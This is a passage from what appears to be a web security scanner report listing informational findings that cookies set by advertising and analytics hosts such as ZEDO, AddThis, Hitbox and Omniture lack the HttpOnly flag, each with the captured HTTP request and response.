Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; FFgeo=2241452; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFChanCap=1573B496,121#876543#543485#675101#544906#543481|1,1,1:0,1,1:14,1,1:0,1,1:0,1,1; ZCBC=1; FFad=0; FFcat=929,286,14

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=929,286,9:929,286,14;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "82a0ef50-838c-4a12afe0ff680"
Vary: Accept-Encoding
X-Varnish: 1634234217 1634232398
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=123
Expires: Sun, 24 Apr 2011 16:00:08 GMT
Date: Sun, 24 Apr 2011 15:58:05 GMT
Connection: close
Content-Length: 2458

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=123;var zzPat='';var zzC
...[SNIP]...

18.260. http://d7.zedo.com/bar/v16-405/d2/jsc/fmr.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d2/jsc/fmr.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bar/v16-405/d2/jsc/fmr.js?c=286&a=0&f=&n=929&r=13&d=14&q=&$=&s=123&z=0.5585765927098691 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; FFgeo=2241452; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFChanCap=1573B496,121#876543#543485#675101#544906#543481|1,1,1:0,1,1:14,1,1:0,1,1:0,1,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=929,286,14;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "831e6297-8181-4a12afe7ac640"
Vary: Accept-Encoding
X-Varnish: 1634235142 1634232783
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=39
Expires: Sun, 24 Apr 2011 16:00:25 GMT
Date: Sun, 24 Apr 2011 15:59:46 GMT
Connection: close
Content-Length: 2368

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=123;var zzPat='';var zzC
...[SNIP]...

18.261. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.3521318055453627 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: ZCBC=1; FFgeo=2241452; FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFad=3:3:0:0; ZEDOIDA=xlO0TcGt89Z-t7Q0A2jzc9p9~042411; ZEDOIDX=21; FFCap=1574B809,210841,210133,210132,204732,204731|0,1,1:0,1,1:0,1,1:0,1,1:0,1,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFgeo=2241452;expires=Mon, 23 Apr 2012 16:46:17 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:3:3:0;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFCap=1574B809,210841,210133,210132,204732,204731|0,1,1:0,1,1:0,1,1:0,1,1:1,1,1;expires=Tue, 24 May 2011 16:46:17 GMT;path=/;domain=.zedo.com;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=244
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:46:17 GMT
Connection: close
Content-Length: 2147

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...

18.262. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.39779967732526683 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21

Response

HTTP/1.1 500 Internal Server Error
Server: ZEDO 3G
Content-Length: 157
Content-Type: text/html
Set-Cookie: FFgeo=2241452;expires=Mon, 23 Apr 2012 16:46:46 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:None:None:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFCap=1574B809,204731|0,1,1;expires=Tue, 24 May 2011 16:46:46 GMT;path=/;domain=.zedo.com;
Set-Cookie: ZEDOIDA=9lO0TcGt89aSPx9eFv62EiFe~042411;expires=Wed, 21 Apr 2021 16:46:46 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=215
Expires: Sun, 24 Apr 2011 16:50:22 GMT
Date: Sun, 24 Apr 2011 16:46:47 GMT
Connection: close

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (500 Internal Server Error) has occured in response to this request.
</BODY>
</HTML>

18.263. http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fmr.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-405/d3/jsc/fmr.js?c=1050&a=0&f=&n=809&r=21&d=21&q=&$=&s=376&z=0.7153747249743863 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFgeo=2241452;expires=Mon, 23 Apr 2012 16:45:58 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: ZEDOIDA=xlO0TcGt89YsDMgJ3lU7cLwy~042411;expires=Wed, 21 Apr 2021 16:45:58 GMT;domain=.zedo.com;path=/;
ETag: "426044d-8181-4a12b03c8ce80"
Vary: Accept-Encoding
X-Varnish: 1634248835 1634247186
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=263
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:45:58 GMT
Connection: close
Content-Length: 2733

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...

18.264. http://data.adsrvr.org/map/cookie/google  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.adsrvr.org
Path:   /map/cookie/google

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /map/cookie/google?g_uuid=CAESEA3NkbgBJciWS7F8ZrJI0tc&cver=1 HTTP/1.1
Host: data.adsrvr.org
Proxy-Connection: keep-alive
Referer: http://insight.adsrvr.org/track/conv?pid=2ktjv7m&fmt=1&ct=0:RMLanding&v=1&vf=USD&adv=v1oo6vo&coid=3zvxjhl
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TDID=1cf8781b-f036-4ffe-a17c-988bc661e967

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Cache-Control: private,no-cache, must-revalidate
Content-Type: image/gif
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV"
Date: Mon, 25 Apr 2011 00:32:57 GMT
Pragma: no-cache
Set-Cookie: TDID=1cf8781b-f036-4ffe-a17c-988bc661e967; domain=.adsrvr.org; expires=Wed, 25-Apr-2012 00:32:57 GMT; path=/
Set-Cookie: X-Mapping-fjhppofk=79D79D0E3FB84166CA25A6036E2D4D48; path=/
Content-Length: 70

GIF89a...................!..NETSCAPE2.0.....!.......,................;

18.265. http://dogtimemedia.squarespace.com/storage/dogtimecom-default-banners/sad-shopping-120x90.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dogtimemedia.squarespace.com
Path:   /storage/dogtimecom-default-banners/sad-shopping-120x90.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /storage/dogtimecom-default-banners/sad-shopping-120x90.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: dogtimemedia.squarespace.com

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=D378AFF1D54A6A90BBD6DF0E7BFB336F.web119; Path=/; HttpOnly
X-ServedBy: web119
Pragma: cache
Cache-Control: private,max-age=86400
Last-Modified: Tue, 22 Feb 2011 21:40:58 GMT
Content-Type: image/jpeg;charset=UTF-8
Content-Length: 5670
Date: Sun, 24 Apr 2011 16:46:05 GMT
Server: SSWS
Set-Cookie: BIGipServerWebServers=1996597440.20480.0000; path=/

......JFIF.....H.H.....C...........    ...    .......

.

........................... ...C.............. ......Z.x.................................
...[SNIP]...

18.266. http://ds.addthis.com/red/psi/sites/krypt.com/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/krypt.com/p.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/psi/sites/krypt.com/p.json?callback=_ate.ad.hpr&uid=4dab4fa85facd099&url=http%3A%2F%2Fkrypt.com%2Fdedicated%2F&ref=http%3A%2F%2Fkrypt.com%2F&yrfn6b HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh39.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; psc=4; di=1303529621.60|1303529621.1FE; dt=X; uid=4dab4fa85facd099

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 305
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sun, 24 Apr 2011 16:35:02 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Tue, 24 May 2011 16:35:02 GMT; Path=/
Set-Cookie: di=%7B%7D..1303662902.1FE|1303662902.60; Domain=.addthis.com; Expires=Tue, 23-Apr-2013 16:35:02 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sun, 24 Apr 2011 16:35:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 24 Apr 2011 16:35:02 GMT
Connection: close

_ate.ad.hpr({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4dab4fa85facd099","http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dab4fa85facd099&curl=http%3a%2f%2
...[SNIP]...

18.267. http://ehg-swisscom.hitbox.com/HG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ehg-swisscom.hitbox.com
Path:   /HG

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HG?hc=&hb=DM560815NFZA93EN3&cd=1&hv=6&n=/Fixed+network+Phones&con=&vcon=/OS_Festnetz/OS_Telefone/OS_Festnetz&tt=none&ja=y&dt=13&zo=300&lm=1303689087000&bn=Netscape&ce=y&ss=1920*1200&sc=16&sv=16&cy=u&hp=u&ln=en-US&vpc=HBX0200u&vjs=HBX0201.03u&hec=0&pec=&cmp=&gp=&dcmp=&dcmpe=&dcmpre=&cp=null&fnl=&seg=&epg=&cv=&gn=&ld=&la=&c1=&c2=&c3=&c4=&customerid=&ttt=lid,lpos&ra=&pu=&rf=http%3A//en.swisscom.ch/residential&pl=Shockwave%20Flash%3AJava%20Deployment%20Toolkit%206.0.240.7%3AJava%28TM%29%20Platform%20SE%206%20U24%3ASilverlight%20Plug-In%3AChrome%20PDF%20Viewer%3AGoogle%20Gears%200.5.33.0%3AWPI%20Detector%201.3%3AGoogle%20Update%3ADefault%20Plug-in%3A&lv.id=&lv.pos=&hid=0.14724937756545842 HTTP/1.1
Host: ehg-swisscom.hitbox.com
Proxy-Connection: keep-alive
Referer: http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=3&lang=EN
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WSS_GW=V1z%XrXQ@eX%X; CTG=1303576541

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:52:40 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: DM560815NFZAV6=V1^X(#X"rz%XrXe@%%erierB@Qz%zrzr"%XrXe@%%erz%XrXe@%%er"%XrXe@%%er"%XrXe@%%erierB@Q"rz(xB$<}xQ$$aFfTafUxB$<}xQ$8a~a7:TaxB$<}xQ$$aFfTafUxB$$2Ka_xBrTafk:hdxBrYO:TaFz7}z)OuKr6@@zA6<}v$aFfTafU6<}v8a~a7:Ta6<}v$aFfTafU6$2Ka_HTafk:hdHYO:TaFzOffGxXjxB$xB$aTxB(Fk2FFc:mxB(cOxB$haF2_aTf2I~; path=/; domain=ehg-swisscom.hitbox.com; expires=Mon, 23-Apr-2012 18:52:40 GMT; max-age=31536000
Set-Cookie: WSS_GW=V1z%XrXe@%%er; path=/; domain=.hitbox.com; expires=Mon, 23-Apr-2012 18:52:40 GMT; max-age=31536000
Set-Cookie: CTG=1303671160; path=/; domain=.hitbox.com; expires=Sun, 01-May-2011 18:52:40 GMT; max-age=604800
Cneonction: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Sun, 24 Apr 2011 18:52:41 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

18.268. http://ehg-swisscom.hitbox.com/HGct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ehg-swisscom.hitbox.com
Path:   /HGct

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HGct?hc=&hb=DM560815NFZA93EN3&cd=1&hv=6&n=blank&con=&vcon=/OS_Festnetz/OS_Telefone/OS_Festnetz/1000299810&tt=none&ja=y&dt=13&zo=300&lm=1303671368000&ce=n&ss=1920*1200&sc=16&sv=15&cy=lan&hp=y&ln=en-us&vpc=HBX0200u&vjs=HBX0201.03u&hec=0&pec=&cmp=&gp=&dcmp=&dcmpe=&dcmpre=&cp=null&fnl=&seg=&epg=&cv=&gn=&ld=&la=&c1=&c2=&c3=&c4=&customerid=&ttt=lid,lpos&ra=&pu=&rf=bookmark&pl=&lv.id=&lv.pos=&hid=0.19698849324288375 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ehg-swisscom.hitbox.com
Cookie: CTG=1303671357

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:55:58 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: DM560815NFZAV6=V1^X(#X"rz%XrXe@%XQiierer@z%zrzr"%XrXe@%XQiz%XrXe@%XQi"%XrXe@%XQi"%XrXe@%XQiierer@"rz(xB$<}xQ$$aFfTafUxB$<}xQ$8a~a7:TaxB$<}xQ$$aFfTafUxB$%rrrB^^i%rxB$u~ITdz7}z)OuKr6%%BzA6<}v$aFfTafU6<}v8a~a7:Ta6<}v$aFfTafU6%rrrB^^i%r6u~ITdzu::dmIhd; path=/; domain=ehg-swisscom.hitbox.com; expires=Mon, 23-Apr-2012 18:55:58 GMT; max-age=31536000
Set-Cookie: WSS_GW=V1z%XrXe@%XQi; path=/; domain=.hitbox.com; expires=Mon, 23-Apr-2012 18:55:58 GMT; max-age=31536000
Set-Cookie: CTG=1303671358; path=/; domain=.hitbox.com; expires=Sun, 01-May-2011 18:55:58 GMT; max-age=604800
Cneonction: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Sun, 24 Apr 2011 18:55:59 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

18.269. http://equfx.netmng.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://equfx.netmng.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?aid=089&tax=search HTTP/1.1
Host: equfx.netmng.com
Proxy-Connection: keep-alive
Referer: http://equifax.com/free30daytrial/?CMP=KNC-Google&HBX_PK=credit_monitoring_service&HBX_OU=50&gclid=CNf214_1tagCFeM85Qod4FaqEA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=cb45f86e-c186-488a-9d0f-aec6be178ed4; evo5=z2r8aytrpwakd%7CVnJm2nQviGpaZgoGV9njty5dIKdTca7cnNRAhZgA7bUbQnOUYrA7QBTQboME7kIs19d0OlmuCnEeS5N%2BBoSear2lfgsSwBvum2xekwmZoirZuJ4TXW2WJtuCxf1Pp6ICIBk9N%2FoTrTdf3BCWsu823ZkyUJT7dLxvLsz0w3DIGnrdxoSNhm6xM%2FE9JbrlmDUWUcuxr1W8xHYYCCPmO5uHdnaoIVbKtmx2uYNLFduONvRvhMR46uJ4OnjnsgS460tRM3axEGKfL%2Fwm%2BuXWLQDQwgQ4%2F0HN%2B81ajfaXCwGP3na8atr8q00NzqmcJWES426PY6CkoksWs82sE4ogKqAdyA%3D%3D

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:44:40 GMT
Server: Apache/2.2.9
P3P: policyref="http://equfx.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Fri, 22 Apr 2011 19:44:40 GMT
Last-Modified: Fri, 22 Apr 2011 19:44:40 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5=z2r8aytrpwakd%7CaX1f%2BX%2FH0XmnewULrgjFuBdyNO5Bfd3pDQ5D3BffaKygm7dWhxyfMeptI88DhCWPCMieuKmcL2x7c%2BH19wRjGU6WMC%2Fj5YTTPSS3NzPOIqDufmtYKfD%2Fi7sByDhAGs4OaaGcL4fkM8ToE%2B1SbyyQPiv4JgRuJqgqvzAT0PhUc2Qq%2FA2FuWNxwCQiehpdqupOwMrOGkuNMKcb6Y%2BAaCdn6sjXowEdBlDwqn1M5yyByn0Mo2yD2HaLuUD5MWy4CYKI6X7QwffnTgfB6NG4hGmbw6tDbDL4x7rpuRd4CBCv9vA%3D; expires=Mon, 24-Oct-2011 19:44:40 GMT; path=/; domain=.netmng.com
Content-Length: 618
Connection: close
Content-Type: text/html; charset=UTF-8


var i=document.createElement('IMG'); i.src='http://ad.trafficmp.com/a/bpix?adv=1470&id=1&r='; i.width=1; i.height=1; i.border=0; i.vspace=0; i.hspace=1; document.body.appendChild(i);
var i=document.
...[SNIP]...

18.270. http://equifaxps.122.2o7.net/b/ss/equifaxprod,equifaxglobal/1/H.17/s01850123399873  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://equifaxps.122.2o7.net
Path:   /b/ss/equifaxprod,equifaxglobal/1/H.17/s01850123399873

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/equifaxprod,equifaxglobal/1/H.17/s01850123399873?AQB=1&ndh=1&t=24/3/2011%2014%3A55%3A25%200%20300&ns=equifaxps&pageName=/us/psol/web/lander/ECLanderM-Q1NEWFREETRIAL&g=about%3Ablank&cc=USD&ch=Personal%20Solutions&server=Samba&events=event8&c7=12%3A30PM&v7=12%3A30PM&c8=Sunday&v8=Sunday&c10=New&v10=New&c14=/us/psol/web/lander/ECLanderM-Q1NEWFREETRIAL&v14=/us/psol/web/lander/ECLanderM-Q1NEWFREETRIAL&v16=/us/psol/web/lander/ECLanderM-Q1NEWFREETRIAL&s=1920x1200&c=16&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: equifaxps.122.2o7.net

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 20:20:31 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26DA4307051D2101-400001020004D981[CE]; Expires=Fri, 22 Apr 2016 20:20:30 GMT; Domain=equifaxps.122.2o7.net; Path=/
Location: http://equifaxps.122.2o7.net/b/ss/equifaxprod,equifaxglobal/1/H.17/s01850123399873?AQB=1&pccr=true&vidn=26DA4307051D2101-400001020004D981&&ndh=1&t=24/3/2011%2014%3A55%3A25%200%20300&ns=equifaxps&pageName=/us/psol/web/lander/ECLanderM-Q1NEWFREETRIAL&g=about%3Ablank&cc=USD&ch=Personal%20Solutions&server=Samba&events=event8&c7=12%3A30PM&v7=12%3A30PM&c8=Sunday&v8=Sunday&c10=New&v10=New&c14=/us/psol/web/lander/ECLanderM-Q1NEWFREETRIAL&v14=/us/psol/web/lander/ECLanderM-Q1NEWFREETRIAL&v16=/us/psol/web/lander/ECLanderM-Q1NEWFREETRIAL&s=1920x1200&c=16&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&AQE=1
X-C: ms-4.4.1
Expires: Sat, 23 Apr 2011 20:20:30 GMT
Last-Modified: Mon, 25 Apr 2011 20:20:30 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www16
Content-Length: 0
Content-Type: text/plain


18.271. http://equifaxps.122.2o7.net/b/ss/equifaxprod,equifaxglobal/1/H.17/s0893607710022  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://equifaxps.122.2o7.net
Path:   /b/ss/equifaxprod,equifaxglobal/1/H.17/s0893607710022

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

